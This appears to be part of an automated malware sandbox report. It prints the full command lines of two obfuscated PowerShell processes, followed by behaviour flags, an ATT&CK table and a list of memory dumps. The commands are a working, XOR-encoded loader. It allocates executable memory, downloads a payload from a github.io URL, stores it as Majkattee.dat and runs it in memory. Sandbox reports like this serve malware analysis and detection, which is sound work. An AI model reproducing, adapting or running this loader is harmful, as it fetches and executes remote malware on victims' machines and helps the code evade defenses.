$Rhipsali+=(1+1)){ $Residentsb = $Residentsb + $Flskekd.$Pendrag.Invoke($Rhipsali, 1); } $Residentsb;}$hopingunde0 = Tilraadel9 'N C B K T D R R M B L G s B B K R M S B R P S P I S S O t F R E C C P S B B T E S LIAEUXB ';$hopingunde1= Tilraadel9 $Femaarig;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $hopingunde1 ;}else{&$hopingunde0.trim() $hopingunde1;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:240

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Folkeb00 {param([String]$Flskekd);For($Rhipsali=1; $Rhipsali -lt $Flskekd.Length-1; $Rhipsali+=(1+1)){$Residentsb = $Residentsb + $Flskekd.Substring($Rhipsali, 1);}$Residentsb;}$Folkeb02 = Folkeb00 'WIPnIvuoKkReT-REBxBpArpeTsPsAiSosnT ';$Folkeb01 = Folkeb00 'U$SNToBnSrDeUtTrS[V$TRPhHiSpHsPaClFiF/E2F]H Z=b K[McGoPnLvMeFrStG]L:S:ATVofBCyEtneF(O$SFIlCsEkbeAkUdH.FSMuHbWsFtOrBiBnigT(L$ARThMiBpSsSaFlMiM,L H2U)P,C K1S6D)S ';Function HTB {param([String]$Flskekd);$Nonretr = New-Object byte[] ($Flskekd.Length / 2);For($Rhipsali=0; $Rhipsali -lt $Flskekd.Length; $Rhipsali+=2){.($Folkeb02) $Folkeb01;$Nonretr[$Rhipsali/2] = ($Nonretr[$Rhipsali/2] -bxor 69);}[String][System.Text.Encoding]::ASCII.GetString($Nonretr);}$Spou0=HTB '163C363120286B212929';$Spou1=HTB '082C26372A362A23316B122C2B76776B102B362423200B24312C33200820312D2A2136';$Spou2=HTB '02203115372A2604212137203636';$Spou3=HTB '163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B0D242B212920172023';$Spou4=HTB '3631372C2B22';$Spou5=HTB '022031082A213029200D242B212920';$Spou6=HTB '1711163520262C24290B24282069650D2C2120073C162C226965153027292C26';$Spou7=HTB '17302B312C2820696508242B24222021';$Spou8=HTB '1720232920263120210120292022243120';$Spou9=HTB '0C2B0820282A373C082A21302920';$Unvit0=HTB '083C0120292022243120113C3520';$Unvit1=HTB '06292436366965153027292C2669651620242920216965042B362C062924363669650430312A0629243636';$Unvit2=HTB '0C2B332A2E20';$Unvit3=HTB '153027292C2669650D2C2120073C162C2269650B203216292A316965132C3731302429';$Unvit4=HTB '132C37313024290429292A26';$Unvit5=HTB '2B31212929';$Unvit6=HTB '0B3115372A31202631132C37313024290820282A373C';$Unvit7=HTB '0C001D';$Unvit8=HTB '19';$Hemipe=HTB '101600177677';$Sycosif=HTB '06242929122C2B212A3215372A2604';function fkp {Param ($Tnke, $Swineherdp) ;$Limfabrikk1180 =HTB '6111373720292A236578656D1E043535012A28242C2B187F7F06303737202B31012A28242C2B6B022031043636202827292C20366D6C653965122D203720680A272F202631653E65611A6B02292A272429043636202827293C0624262D206568042B2165611A6B092A2624312C2A2B6B1635292C316D61102B332C317D6C1E6874186B0034302429366D6116352A30756C65386C6B022031113C35206D6116352A30746C';&($Unvit7) $Limfabrikk1180;$Limfabrikk1185 = HTB '61082031242933242B216578656111373720292A236B0220310820312D2A216D6116352A307769651E113C35201E181865056D6116352A307669656116352A30716C6C';&($Unvit7) $Limfabrikk1185;$Limfabrikk1181 = HTB '37203130372B6561082031242933242B216B0C2B332A2E206D612B3029296965056D1E163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B0D242B212920172023186D0B2032680A272F20263165163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B0D242B2129201720236D6D0B2032680A272F202631650C2B311531376C69656D6111373720292A236B0220310820312D2A216D6116352A30706C6C6B0C2B332A2E206D612B3029296965056D61112B2E206C6C6C6C69656116322C2B202D203721356C6C';&($Unvit7) $Limfabrikk1181;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $skydev,[Parameter(Position = 1)] [Type] $Eleuthe = [Void]);$Limfabrikk1182 = HTB '610437202B2C262A296578651E043535012A28242C2B187F7F06303737202B31012A28242C2B6B0120232C2B20013C2B24282C26043636202827293C6D6D0B2032680A272F20263165163C363120286B172023292026312C2A2B6B043636202827293C0B2428206D6116352A307D6C6C69651E163C363120286B172023292026312C2A2B6B00282C316B043636202827293C07302C29212037042626203636187F7F17302B6C6B0120232C2B20013C2B24282C26082A213029206D6116352A307C69656123242936206C6B0120232C2B20113C35206D61102B332C3175696561102B332C317469651E163C363120286B083029312C262436310120292022243120186C';&($Unvit7) $Limfabrikk1182;$Limfabrikk1183 = HTB '610437202B2C262A296B0120232C2B20062A2B3631373026312A376D6116352A307369651E163C363120286B172023292026312C2A2B6B062429292C2B22062A2B33202B312C2A2B36187F7F1631242B21243721696561362E3C2120336C6B1620310C2835292028202B3124312C2A2B03292422366D6116352A30726C';&($Unvit7) $Limfabrikk1183;$Limfabrikk1184 = HTB '610437202B2C262A296B0120232C2B200820312D2A216D61102B332C3177696561102B332C317669656100292030312D20696561362E3C2120336C6B1620310C2835292028202B3124312C2A2B03292422366D6116352A30726C';&($Unvit7) $Limfabrikk1184;$Limfabrikk1185 = HTB '37203130372B65610437202B2C262A296B063720243120113C35206D6C';&($Unvit7) $Limfabrikk1185 ;}$Engangsem = HTB '2E20372B20297677';$Limfabrikk1186 = HTB '61102B21206578651E163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B082437362D2429187F7F0220310120292022243120032A3703302B26312C2A2B152A2C2B3120376D6D232E356561002B22242B223620286561102B332C31716C69656D02011165056D1E0C2B311531371869651E100C2B3176771869651E100C2B3176771869651E100C2B317677186C656D1E0C2B31153137186C6C6C';&($Unvit7) $Limfabrikk1186;$Negotiat = fkp $Unvit5 $Unvit6;$Limfabrikk1187 = HTB '61063C26292A2C7665786561102B21206B0C2B332A2E206D1E0C2B31153137187F7F1F20372A69657371726965753D767575756965753D71756C';&($Unvit7) $Limfabrikk1187;$Limfabrikk1188 = HTB '61042437313065786561102B21206B0C2B332A2E206D1E0C2B31153137187F7F1F20372A6965767D747C707775756965753D767575756965753D716C';&($Unvit7) $Limfabrikk1188;$Residentsb01 = 'https://quickcheckx.github.io/quickme/Milieu.snp';$Residentsb00 = HTB '61112C293724242120296578656D0B2032680A272F202631650B20316B12202706292C202B316C6B012A322B292A24211631372C2B226D611720362C21202B31362775746C';$Limfabrikk1188 = HTB '61063C26292A2C777861202B337F24353521243124';&($Unvit7) $Limfabrikk1188;$Cycloi2=$Cycloi2+'\Majkattee.dat';$Tilraadel='';if (-not(Test-Path $Cycloi2)) {while ($Tilraadel -eq '') {&($Unvit7) $Residentsb00;Start-Sleep 5;}Set-Content $Cycloi2 $Tilraadel;}$Tilraadel = Get-Content $Cycloi2;$Limfabrikk1189 = HTB '61092C28232427372C2E2E74747D6578651E163C363120286B062A2B33203731187F7F03372A280724362073711631372C2B226D61112C293724242120296C';&($Unvit7) $Limfabrikk1189;$Tilraadel0 = HTB '1E163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B082437362D2429187F7F062A353C6D61092C28232427372C2E2E74747D69657569656561063C26292A2C7669657371726C';&($Unvit7) $Tilraadel0;$Presa=$Limfabrikk118.count-647;$Tilraadel1 = HTB '1E163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B082437362D2429187F7F062A353C6D61092C28232427372C2E2E74747D6965737172696561042437313069656115372036246C';&($Unvit7) $Tilraadel1;$Tilraadel2 = HTB '61163524266578651E163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B082437362D2429187F7F0220310120292022243120032A3703302B26312C2A2B152A2C2B3120376D6D232E3565610D20282C35206561163C262A362C236C69656D02011165056D1E0C2B311531371869651E0C2B311531371869651E0C2B311531371869651E0C2B311531371869651E0C2B31153137186C656D1E0C2B31153137186C6C6C';&($Unvit7) $Tilraadel2;$Tilraadel3 = HTB '61163524266B0C2B332A2E206D61063C26292A2C766961042437313069610B20222A312C2431697569756C';&($Unvit7) $Tilraadel3#"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:964

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/240-61-0x000000000258B000-0x00000000025AA000-memory.dmp

Filesize
124KB

Download
memory/240-55-0x0000000000000000-mapping.dmp

Download
memory/240-57-0x000007FEF36F0000-0x000007FEF4113000-memory.dmp

Filesize
10.1MB

Download
memory/240-59-0x0000000002584000-0x0000000002587000-memory.dmp

Filesize
12KB

Download
memory/240-58-0x000007FEF2B90000-0x000007FEF36ED000-memory.dmp

Filesize
11.4MB

Download
memory/240-60-0x000000001B750000-0x000000001BA4F000-memory.dmp

Filesize
3.0MB

Download
memory/240-65-0x0000000002584000-0x0000000002587000-memory.dmp

Filesize
12KB

Download
memory/240-66-0x000000000258B000-0x00000000025AA000-memory.dmp

Filesize
124KB

Download
memory/964-62-0x0000000000000000-mapping.dmp

Download
memory/964-63-0x0000000074F41000-0x0000000074F43000-memory.dmp

Filesize
8KB

Download
memory/964-64-0x00000000732A0000-0x000000007384B000-memory.dmp

Filesize
5.7MB

Download
memory/964-67-0x00000000732A0000-0x000000007384B000-memory.dmp

Filesize
5.7MB

Download
memory/1344-54-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing